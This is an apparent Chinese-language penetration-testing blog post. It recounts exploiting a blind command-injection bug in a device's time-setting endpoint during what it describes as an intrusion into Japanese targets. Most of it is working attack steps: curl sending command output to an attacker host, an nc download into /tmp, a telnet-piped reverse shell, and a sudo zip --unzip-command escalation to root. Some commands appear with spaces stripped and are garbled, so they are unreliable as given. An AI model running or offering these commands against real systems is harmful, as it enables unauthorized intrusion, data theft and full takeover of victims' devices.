01
测试阶段
文章首发于奇安信攻防社区:
https://forum.butian.net/share/2551
跟大哥一起渗透樱花国的时候发现个RCE
无回显,使用curl进行测试
大哥服务器上有个接受参数回显的脚本,启动并监听
成功接收到该回显
time=`curl x.x.x.x -d"c=$(id)"`
尝试写入测试,失败
尝试远程下载wget,powershell上线等方式,均失败
使用cat读取代码
简单说下代码,接受post的time参数,将T替换成空格,将/替换成-,然后把过滤过的参数放进SystemSetting_setLocalTime函数当中
跟进函数,接收参数后拼接到$cmd_date_set中
然后在48行中过滤掉|,然后拼接到exec中进行命令执行,其中|符号用不了,可以使用反引号``来代替拼接
所以我们现在知道了屏蔽了/ | 三个符号
梳理下思路,一般利用方式因为/的原因,所以用不了http协议,无法尝试远程下载等方式,没有权限进行写入文件,那么现在几种方式进行bypass,第一种,替换/|符号,比如常见的空格符$IFS替换,第二种,进行提权写入文件,第三种,想办法再挖一个其他漏洞进行组合利用,第四种,尝试在其他目录写文件执行
那么先查看有哪些命令可用
使用compgen -c没有回显,echo $PATH只返回个H,最后使用busybox进行输出测试
常用的思路到这卡住了,尝试使用进行读取某一个字符并输出到当前目录,但发现该方法也无效,没有生成成功output.txt
ddif=1bs=1skip=9count=1status=noneof=output.txt
继续想办法,虽然限制了/不能进行cd ../..等,但是正常的cd ..是可以使用的
使用命令
cd..;cd..;cd..;cd..;cdtmp;ncx.x.x.x81>1.sh
发现是可以成功的
02
成功getshell
经过测试,成功步骤如下
以下简称服务端,其中被控端为目标设备
1 服务端启用nc监听,并在被控端中写入命令
被控端:
cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 81 > 1.sh
服务端:
sudo nc -lvvnp 85
2 服务端写命令
telnet x.x.x.x82|/bin/sh | telnet x.x.x.x83
回车后打开burp
3 被控端写命令
time=`curl x.x.x.x -d"c=$(cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 85 > 1.sh)"`
4发包,发现成功写入1.sh
5 监听82,83端口
并发包
time=`cd..;cd..;cd..;cd..;cdtmp;sh 1.sh`
6 至此成功拿到shell
7 进行提权
其中/etc/sudoers 设置了nobody可以使用sudo不需要输入密码的命令
又因为/usr/bin/zip 有一个参数–unzip-command可以执行命令
所以使用以下命令就可以直接进行提权
sudo /usr/bin/zip1aca.zip/etc/passwd -T--unzip-command="sh -c /bin/sh"
拿到root权限。
03
方法二
第二种方法,根据文件代码,发现一个上传点如下
其中路径为/svr/www,没有到网站目录/www/,那么利用方法就是上传一个文件,在使用rce进行执行拿到shell,在34行有个简单的判断是否为zip格式文件,但是并没有限制后缀名等条件
简单写个poc
其中写入的内容如下
sudo /usr/bin/zip1aca.zip/etc/syslog.conf -T--unzip-command="sh -c 'id > /tmp/test.txt'"
上传成功后跟之前的利用思路一样,跨目录进行读取
圆满成功!感谢@昭通早行网络科技有限公司的各位师傅不吝赐教!!!
宣传页
ZAC安全
本人微信:zacaq999
文章内容如有任何错误或者对不上号的,可以加我微信,感谢各位大佬们的指点
安全宝典欢迎各位大佬以投稿方式免费进入!
原文始发于微信公众号(ZAC安全):一次有趣的RCEbypass
